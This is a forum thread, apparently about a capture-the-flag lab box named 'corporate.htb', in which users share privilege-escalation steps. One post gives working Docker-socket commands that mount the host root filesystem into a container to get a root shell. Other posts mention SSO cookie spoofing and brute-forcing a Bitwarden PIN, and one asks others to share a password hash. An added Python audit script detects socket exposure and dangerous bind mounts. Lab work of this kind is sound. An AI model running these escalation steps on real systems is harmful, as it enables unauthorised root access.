Posts: 14
Threads: 0
Joined: Aug 2023
(Dec 31, 2023, 05:39 PM)PK6CfvT8 Wrote: (Dec 22, 2023, 05:04 PM)magway Wrote: I got root on the workstation and there is no fucking flag..
root@corporate-workstation-04:~# ls -al
total 36
drwx------ 6 root root 4096 Dec 22 16:55 .
drwxr-xr-x 19 root root 4096 Nov 27 21:57 ..
lrwxrwxrwx 1 root root 9 Nov 28 15:28 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Oct 15 2021 .bashrc
drwx------ 3 root root 4096 Dec 22 16:55 .gnupg
-rw------- 1 root root 20 Nov 7 14:34 .lesshst
drwxr-xr-x 3 root root 4096 Apr 12 2023 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
drwx------ 3 root root 4096 Apr 12 2023 snap
drwx------ 2 root root 4096 Apr 12 2023 .ssh
-rw-r--r-- 1 root root 0 Apr 12 2023 .sudo_as_admin_successful
How did you move from elwin.jones to root?
In case someone comes to this:
- the next trick is searching for the docker socket
- find / -name docker.sock 2>/dev/null
- ls -la /run/docker.sock
- it is in group 'engineer'
- find a user in that group / reset the password via SSO (cookie spoofing) and log in to SSH
- privesc to root using docker (which I still have to figure out)
Posts: 2
Threads: 0
Joined: Sep 2023
(Jan 03, 2024, 08:44 AM)PK6CfvT8 Wrote: (Dec 31, 2023, 05:39 PM)PK6CfvT8 Wrote: (Dec 22, 2023, 05:04 PM)magway Wrote: I got root on the workstation and there is no fucking flag..
root@corporate-workstation-04:~# ls -al
total 36
drwx------ 6 root root 4096 Dec 22 16:55 .
drwxr-xr-x 19 root root 4096 Nov 27 21:57 ..
lrwxrwxrwx 1 root root 9 Nov 28 15:28 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Oct 15 2021 .bashrc
drwx------ 3 root root 4096 Dec 22 16:55 .gnupg
-rw------- 1 root root 20 Nov 7 14:34 .lesshst
drwxr-xr-x 3 root root 4096 Apr 12 2023 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
drwx------ 3 root root 4096 Apr 12 2023 snap
drwx------ 2 root root 4096 Apr 12 2023 .ssh
-rw-r--r-- 1 root root 0 Apr 12 2023 .sudo_as_admin_successful
How did you move from elwin.jones to root?
In case someone comes to this:
- the next trick is searching for the docker socket
- find / -name docker.sock 2>/dev/null
- ls -la /run/docker.sock
- it is in group 'engineer'
- find a user in that group / reset the password via SSO (cookie spoofing) and log in to SSH
- privesc to root using docker (which I still have to figure out)
From there you can download a docker image such as alpine, import it and mount the host filesystem in the container:
# download alpine locally
wget https://github.com/alpinelinux/docker-alpine/raw/97c57449282d97cfa1c0b64669aed9afbf08645a/x86_64/alpine-minirootfs-3.19.0-x86_64.tar.gz
# transfer it into the workstation
scp alpine-minirootfs-3.19.0-x86_64.tar.gz ward.pfannerstill@10.9.0.4:/tmp
# import the image
cat /tmp/alpine-minirootfs-3.19.0-x86_64.tar.gz | docker import - alpine
# mount the host filesystem in the container
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
https://book.hacktricks.xyz/linux-harden...escalation
https://gtfobins.github.io/gtfobins/docker/#shell
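The post above turns on two conditions: a Docker socket writable by a non-root group, and a container that bind-mounts the host root. The following audit script is an added example, not code from the thread or from any of its participants; it parses a constructed `ls -la` line for the socket and a constructed `/etc/group` fragment (group and user names borrowed from the thread, membership assumed) to list which users effectively hold root through the daemon, and flags `HostConfig.Binds` entries such as the `/:/mnt` mount used above so a defender can spot them in `docker inspect` output.

```python
# Added example (not from the thread): audit docker.sock exposure and flag
# containers that bind-mount sensitive host paths. All sample data below is
# constructed; the group/user names are taken from the thread for illustration.
from dataclasses import dataclass, field
from typing import Dict, List


@dataclass
class SocketExposure:
    path: str
    owner: str
    group: str
    group_writable: bool
    world_writable: bool
    users_with_access: List[str] = field(default_factory=list)


def parse_long_listing(line: str) -> dict:
    """Parse one `ls -la` line into mode/owner/group/path (date columns skipped)."""
    parts = line.split()
    if len(parts) < 9:
        raise ValueError(f"not an ls -la line: {line!r}")
    # Field 9 is the name; for symlinks the '-> target' part follows it.
    return {"mode": parts[0], "owner": parts[2], "group": parts[3], "path": parts[8]}


def parse_group_file(text: str) -> Dict[str, List[str]]:
    """Map group name -> supplementary members from /etc/group content."""
    groups: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, _pw, _gid, members = line.split(":", 3)
        groups[name] = [m for m in members.split(",") if m]
    return groups


def audit_docker_socket(listing_line: str, group_text: str) -> SocketExposure:
    """Report which non-root users can write to the Docker socket.

    Write access to the socket is equivalent to root on the host: the daemon
    runs as root and will bind-mount / into a container on request.
    Caveat: users whose *primary* GID is the socket's group are listed in
    /etc/passwd, not in /etc/group's member field, so they are not seen here.
    """
    entry = parse_long_listing(listing_line)
    mode = entry["mode"]
    if not mode.startswith("s"):
        raise ValueError(f"{entry['path']} is not a socket (mode {mode})")
    group_writable = mode[5] == "w"   # rwx triplets: owner 1-3, group 4-6, other 7-9
    world_writable = mode[8] == "w"
    users: List[str] = []
    if group_writable and entry["group"] != "root":
        users = parse_group_file(group_text).get(entry["group"], [])
    return SocketExposure(path=entry["path"], owner=entry["owner"], group=entry["group"],
                          group_writable=group_writable, world_writable=world_writable,
                          users_with_access=sorted(users))


SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/run/docker.sock", "/var/run/docker.sock")


def dangerous_binds(binds: List[str], sensitive=SENSITIVE_HOST_PATHS) -> List[str]:
    """Return HostConfig.Binds entries ('src:dst[:opts]') whose host source is /
    or lies under another sensitive path. `docker run -v /:/mnt` appears as '/:/mnt'."""
    flagged = []
    for bind in binds:
        src = bind.split(":", 1)[0].rstrip("/") or "/"
        for s in sensitive:
            s_norm = s.rstrip("/") or "/"
            # '/' only matches exactly; any other path matches itself or its subtree.
            if src == s_norm or (s_norm != "/" and src.startswith(s_norm + "/")):
                flagged.append(bind)
                break
    return flagged


# Constructed sample input, modelled on the listing posted in the thread.
SAMPLE_LS_LINE = "srw-rw---- 1 root engineer 0 Dec 22 16:50 /run/docker.sock"
SAMPLE_GROUP_FILE = """\
root:x:0:
docker:x:998:
engineer:x:1005:ward.pfannerstill,elwin.jones
"""
SAMPLE_BINDS = ["/:/mnt", "/home/app/data:/data:ro", "/run/docker.sock:/var/run/docker.sock"]

if __name__ == "__main__":
    report = audit_docker_socket(SAMPLE_LS_LINE, SAMPLE_GROUP_FILE)
    print(f"{report.path}: group={report.group} users_with_access={report.users_with_access}")
    print("dangerous binds:", dangerous_binds(SAMPLE_BINDS))
```

On a live host the same functions take the real `ls -la /run/docker.sock` line and the contents of `/etc/group`; the bind list comes from `docker inspect --format '{{json .HostConfig.Binds}}' <container>`. Adding a user to the socket's group is the moment to review, since it is what the thread's route to root relies on.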
Posts: 57
Threads: 2
Joined: Aug 2023
Hi everybody. What is the web link for Proxmox on port 8006? Tried:
https://10.9.0.1:8006/
https://[::ffff:a09:1]:8006/
No cookie. Please help. Thanks in advance.
Posts: 14
Threads: 0
Joined: Aug 2023
(Jan 07, 2024, 12:02 AM)monkeythefirst Wrote: Hi everybody. What is the web link for Proxmox on port 8006? Tried:
https://10.9.0.1:8006/
https://[::ffff:a09:1]:8006/
No cookie. Please help. Thanks in advance.
This worked for me:
https://10.9.0.1:8006
Posts: 56
Threads: 5
Joined: Nov 2023
Jan 08, 2024, 11:42 PM
(This post was last modified: Jan 08, 2024, 11:42 PM by RebeLHeX.)
Hello, I finally started to focus on this box yesterday and today I got user.txt. With a lot of pain I got to the GIT part and was able to clone all 3 repos. I know they patched the LDAP, so I'm not sure about the next steps since most of the posts here relate to pre-patch. Can anyone point me to the steps (no solutions, just steps)? Thanks!
Posts: 1
Threads: 0
Joined: Jan 2024
Jan 09, 2024, 01:50 PM
(This post was last modified: Jan 09, 2024, 01:57 PM by noooudont.)
Does someone have the sysadmin hash? If yes, please share it.
Posts: 231
Threads: 18
Joined: Jul 2023
Guys! Does anyone have a problem with LDAP? I'm trying to add a sudo user but no luck! I'm connecting to ldap.corporate.htb on port 636 on the 10.9 network!
Posts: 7
Threads: 0
Joined: Nov 2023
(Jan 11, 2024, 01:30 PM)cavour13 Wrote: Guys! Does anyone have a problem with LDAP? I'm trying to add a sudo user but no luck! I'm connecting to ldap.corporate.htb on port 636 on the 10.9 network!
LDAP write permissions have already been patched. You must go the intended path.
Posts: 231
Threads: 18
Joined: Jul 2023
(Jan 11, 2024, 05:04 PM)gazgak001 Wrote: (Jan 11, 2024, 01:30 PM)cavour13 Wrote: Guys! Does anyone have a problem with LDAP? I'm trying to add a sudo user but no luck! I'm connecting to ldap.corporate.htb on port 636 on the 10.9 network!
LDAP write permissions have already been patched. You must go the intended path.
Thanks, I knew it was patched! Now I'm getting an error using bruter.. I put XDG_CONFIG_HOME on my Bitwarden/data.json but it doesn't work!
How can I make it work?
Posts: 148
Threads: 2
Joined: Oct 2023
(Jan 12, 2024, 06:26 PM)cavour13 Wrote: (Jan 11, 2024, 05:04 PM)gazgak001 Wrote: (Jan 11, 2024, 01:30 PM)cavour13 Wrote: Guys! Does anyone have a problem with LDAP? I'm trying to add a sudo user but no luck! I'm connecting to ldap.corporate.htb on port 636 on the 10.9 network!
LDAP write permissions have already been patched. You must go the intended path.
Thanks, I knew it was patched! Now I'm getting an error using bruter.. I put XDG_CONFIG_HOME on my Bitwarden/data.json but it doesn't work!
How can I make it work?
Yes, the intended way is going via Bitwarden instead of the LDAP privesc way. You need to brute-force the PIN. You exported the data right from the app? Inspect the JSON etc. Look into a tool called moz-idb-edit that helps extract the data. Find the kdfIterations in data.json and that's the way you should crack the PIN.
Then, moving on, you will access the git (remember, it's reachable only via VPN, so adjust the hosts file accordingly), get the repos and understand the code, analyze...
Also check previous posts in this topic since intended way is also discussed.